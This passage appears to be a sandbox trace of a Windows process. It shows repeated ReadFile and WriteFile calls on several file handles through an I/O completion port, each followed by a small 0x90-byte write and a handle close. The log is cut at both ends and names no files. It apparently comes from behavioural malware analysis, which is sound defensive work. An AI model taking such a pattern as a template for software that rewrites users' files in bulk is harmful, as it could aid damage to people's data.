lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.960] WriteFile (in: hFile=0x1d0, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x9d20, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020) returned 1 [0156.960] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.961] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3510020) returned 1 [0156.961] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.961] ReadFile (in: hFile=0x19c, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3630020) returned 1 [0156.961] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.961] ReadFile (in: hFile=0x1c8, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3750020) returned 1 [0156.962] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.962] ReadFile (in: hFile=0x1a0, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3870020) returned 1 [0156.962] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.962] ReadFile (in: hFile=0x1a8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 0x0 [0156.962] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.963] ReadFile (in: hFile=0x1d0, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0156.963] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.963] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x3711, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3510020) returned 1 [0156.963] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.963] WriteFile (in: hFile=0x19c, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0xa620, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020) returned 1 [0156.963] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.964] WriteFile (in: hFile=0x1c8, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0x18889, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020) returned 1 [0156.964] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.964] WriteFile (in: hFile=0x1a0, lpBuffer=0x3870124*, nNumberOfBytesToWrite=0xba27, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020) returned 1 [0156.964] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.965] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.965] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] ReadFile (in: hFile=0x1b8, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3510020) returned 0x0 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] ReadFile (in: hFile=0x19c, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3630020) returned 0x0 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] ReadFile (in: hFile=0x1c8, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3750020) returned 0x0 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] ReadFile (in: hFile=0x1a0, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3870020) returned 0x0 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] WriteFile (in: hFile=0x1a8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0156.965] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.965] WriteFile (in: hFile=0x1d0, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2b70020) returned 1 [0156.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.966] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.966] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0156.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.966] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0156.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0156.966] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0156.966] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.966] CloseHandle (hObject=0x1a8) returned 1 [0156.967] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0156.967] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.967] CloseHandle (hObject=0x1d0) returned 1 [0156.968] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0156.971] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.971] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3510020 | out: lpBuffer=0x3510094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3510020) returned 1 [0156.971] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.971] WriteFile (in: hFile=0x19c, lpBuffer=0x3630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020) returned 1 [0156.971] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.971] WriteFile (in: hFile=0x1c8, lpBuffer=0x3750094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020 | out: lpBuffer=0x3750094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020) returned 1 [0156.971] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.971] WriteFile (in: hFile=0x1a0, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020) returned 1 [0156.972] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.972] CloseHandle (hObject=0x1b8) returned 1 [0156.972] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3510020) returned 1 [0156.975] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.975] CloseHandle (hObject=0x19c) returned 1 [0156.976] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3630020) returned 1 [0156.979] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.979] CloseHandle (hObject=0x1c8) returned 1 [0156.980] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0156.983] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0156.983] CloseHandle (hObject=0x1a0) returned 1 [0156.984] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3870020) returned 1 [0156.987] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.358] ReadFile (in: hFile=0x1cc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 1 [0157.359] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.359] WriteFile (in: hFile=0x1cc, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x453a, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0157.361] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.361] ReadFile (in: hFile=0x1cc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x710020) returned 0x0 [0157.361] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0157.361] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0157.361] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.361] WriteFile (in: hFile=0x1cc, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x710020) returned 1 [0157.363] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.363] CloseHandle (hObject=0x1cc) returned 1 [0157.365] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0157.365] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.488] ReadFile (in: hFile=0x1cc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2690020) returned 1 [0157.488] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.488] ReadFile (in: hFile=0x198, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x3480020) returned 1 [0157.489] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.489] WriteFile (in: hFile=0x1cc, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0xdc4c, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 1 [0157.525] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.525] ReadFile (in: hFile=0x1cc, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2690020) returned 0x0 [0157.525] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 0 [0157.525] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0157.525] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.525] WriteFile (in: hFile=0x1cc, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x2690020) returned 1 [0157.530] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0157.530] CloseHandle (hObject=0x1cc) returned 1 [0157.545] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0157.547] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0158.717] WriteFile (in: hFile=0x1e0, lpBuffer=0x3750124, nNumberOfBytesToWrite=0x6534, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3750020) returned 0x0 [0158.722] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0158.723] WriteFile (in: hFile=0x1a8, lpBuffer=0x3990124, nNumberOfBytesToWrite=0x15520, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3990020 | out: lpBuffer=0x3990124, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3990020) returned 0x0 [0158.733] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0158.763] WriteFile (in: hFile=0x1d4, lpBuffer=0x3870094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020 | out: lpBuffer=0x3870094*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3870020) returned 1 [0158.785] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.430] WriteFile (in: hFile=0x1f0, lpBuffer=0x3630124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesWritten=0x282fd50, lpOverlapped=0x3630020) returned 1 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.431] ReadFile (in: hFile=0x1b4, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x282fd50, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x282fd50*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0159.431] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x282fd50, lpCompletionKey=0x282fd4c, lpOverlapped=0x282fd54) returned 1 [0159.432] ReadFile (in: 